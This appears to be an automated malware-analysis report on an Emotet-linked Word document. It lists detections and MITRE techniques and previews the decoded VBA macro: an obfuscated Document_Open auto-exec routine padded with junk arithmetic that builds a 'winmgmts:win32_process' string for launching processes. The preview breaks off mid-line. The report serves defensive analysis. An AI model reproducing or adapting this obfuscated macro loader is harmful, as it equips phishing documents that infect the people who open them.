MALICIOUS
Risk Score: 202

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment

Malware Insights
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute obfuscated code. The ClamAV detection name 'Doc.Dropper.EmotetWinMob0920-9636503-0' strongly suggests the Emotet family and dropper functionality. The macro most likely downloads and executes a second-stage payload, a common Emotet tactic.
Heuristics (6)
- ClamAV: Doc.Dropper.EmotetWinMob0920-9636503-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.EmotetWinMob0920-9636503-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13494 bytes |

SHA-256 (macros.bas): df857c45a3db5c6a6e31b970591a532912501f3c33d6cd46e3e570cfe8278778
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "Kfdzxxqiyvtvsiq7ja"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Call H89x3z3b5tq.O36u5ofen_mter6l7
End Sub
Attribute VB_Name = "H89x3z3b5tq"
Attribute VB_Base = "0{781EB210-E01F-4F11-8E0C-5960A5A82410}{4A19C725-4461-4CAD-9D1F-953D9ABC6782}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function O36u5ofen_mter6l7()
On Error Resume Next
Set HLklks = NJLLKsd
C77ezmf967qy = jsjjswww + wiiwjdd * Q0bj1xh6z9mj7 / CLng(ajakhiq) _
/ qugjasd / CLng(rre * qwewq) - fhaodw * CDate(bhuoqwgof) * jsjsw / Log(W7m4aeu6w2ywjwwjsi)
Kcnmcm1ljjmwqdk7 = Chr(666 - Atn(qwohqd) / jbkqwkje / Tan(iuqwgjd / iuqghjwasd))
Z26g75hza8qyisw = W337p7keeywvf9bh
Znu8p5bcpsiix = (jkbasd / Eqhs43nlveovjqq)
T1qmio29yv9 = CDate(qwiiwi)
Pdow4_o9qtifxcpky = qwkljkwq - Sin(qwhii) - dklhiasd - CBool(qwewqe) / 334 + Fix(qwkhsd)
Eolpqmexjya57j = 105
On Error Resume Next
Set HLklks = NJLLKsd
C77ezmf967qy = jsjjswww + wiiwjdd * Q0bj1xh6z9mj7 / CLng(ajakhiq) _
/ qugjasd / CLng(rre * qwewq) - fhaodw * CDate(bhuoqwgof) * jsjsw / Log(W7m4aeu6w2ywjwwjsi)
Kcnmcm1ljjmwqdk7 = Chr(666 - Atn(qwohqd) / jbkqwkje / Tan(iuqwgjd / iuqghjwasd))
Z26g75hza8qyisw = W337p7keeywvf9bh
Znu8p5bcpsiix = (jkbasd / Eqhs43nlveovjqq)
T1qmio29yv9 = CDate(qwiiwi)
Pdow4_o9qtifxcpky = qwkljkwq - Sin(qwhii) - dklhiasd - CBool(qwewqe) / 334 + Fix(qwkhsd)
C87dh_ylw_mq0pw9ng = ChrW$(Eolpqmexjya57j + (10))
On Error Resume Next
Set HLklks = NJLLKsd
C77ezmf967qy = jsjjswww + wiiwjdd * Q0bj1xh6z9mj7 / CLng(ajakhiq) _
/ qugjasd / CLng(rre * qwewq) - fhaodw * CDate(bhuoqwgof) * jsjsw / Log(W7m4aeu6w2ywjwwjsi)
Kcnmcm1ljjmwqdk7 = Chr(666 - Atn(qwohqd) / jbkqwkje / Tan(iuqwgjd / iuqghjwasd))
Z26g75hza8qyisw = W337p7keeywvf9bh
Znu8p5bcpsiix = (jkbasd / Eqhs43nlveovjqq)
T1qmio29yv9 = CDate(qwiiwi)
Pdow4_o9qtifxcpky = qwkljkwq - Sin(qwhii) - dklhiasd - CBool(qwewqe) / 334 + Fix(qwkhsd)
Umwcd3y6cqklwu = "26{} 328[]9 gv]bhja[]26{} 328[]9 gv]bhja[]w26{} 328[]9 gv]bhja[]i26{} 328[]9 gv]bhja[]nm26{} 328[]9 gv]bhja[]26{} 328[]9 gv]bhja[]gm26{} 328[]9 gv]bhja[]t26{} 328[]9 gv]bhja[]26{} 328[]9 gv]bhja[]" + C87dh_ylw_mq0pw9ng + "26{} 328[]9 gv]bhja[]26{} 328[]9 gv]bhja[]:26{} 328[]9 gv]bhja[]w26{} 328[]9 gv]bhja[]in26{} 328[]9 gv]bhja[]26{} 328[]9 gv]bhja[]326{} 328[]9 gv]bhja[]226{} 328[]9 gv]bhja[]_26{} 328[]9 gv]bhja[]" + H89x3z3b5tq.B72kqfa50fk06as9d + "26{} 328[]9 gv]bhja[]ro26{} 328[]9 gv]bhja[]26{} 328[]9 gv]bhja[]ce26{} 328[]9 gv]bhja[]s26{} 328[]9 gv]bhja[]s26{} 328[]9 gv]bhja[]"
On Error Resume Next
Set HLklks = NJLLKsd
C77ezmf967qy = jsjjswww + wiiwjdd * Q0bj1xh6z9mj7 / CLng(ajakhiq) _
/ qugjasd / CLng(rre * qwewq) - fhaodw * CDate(bhuoqwgof) * jsjsw / Log(W7m4aeu6w2ywjwwjsi)
Kcnmcm1ljjmwqdk7 = Chr(666 - Atn(qwohqd) / jbkqwkje / Tan(iuqwgjd / iuqghjwasd))
Z26g75hza8qyisw = W337p7keeywvf9bh
Znu8p5bcpsiix = (jkbasd / Eqhs43nlveovjqq)
T1qmio29yv9 = CDate(qwiiwi)
Pdow4_o9qtifxcpky = qwkljkwq - Sin(qwhii) - dklhiasd - CBool(qwewqe) / 334 + Fix(qwkhsd)
Ofk00rxxidze8 = Nvub5bswsefx(Umwcd3y6cqklwu)
On Error Resume Next
Set HLklks = NJLLKsd
C77ezmf967qy = jsjjswww + wiiwjdd * Q0bj1xh6z9mj7 / CLng(ajakhiq) _
/ qugjasd / CLng(rre * qwewq) - fhaodw * CDate(bhuoqwgof) * jsjsw / Log(W7m4aeu6w2ywjwwjsi)
Kcnmcm1ljjmwqdk7 = Chr(666 - Atn(qwohqd) / jbkqwkje / Tan(iuqwgjd / iuqghjwasd))
Z26g75hza8qyisw = W337p7keeywvf9bh
Znu8p5bcpsiix = (jkbasd / Eqhs43nlveovjqq)
T1qmio29yv9 = CDate(qwiiwi)
Pdow4_o9qtifxcpky = qwkljkwq - Sin(qwhii) - dklhiasd - CBool(qwewqe) / 334 + Fix(qwkhsd)
On Error Resume Next
Set HLklks = NJLLKsd
C77ezmf967qy = jsjjswww + wiiwjdd * Q0bj1xh6z9mj7 / CLng(ajakhiq) _
/ qugjasd / CLng(rre * qwewq) - fhaodw * CDate(bhuoq
```

... (truncated)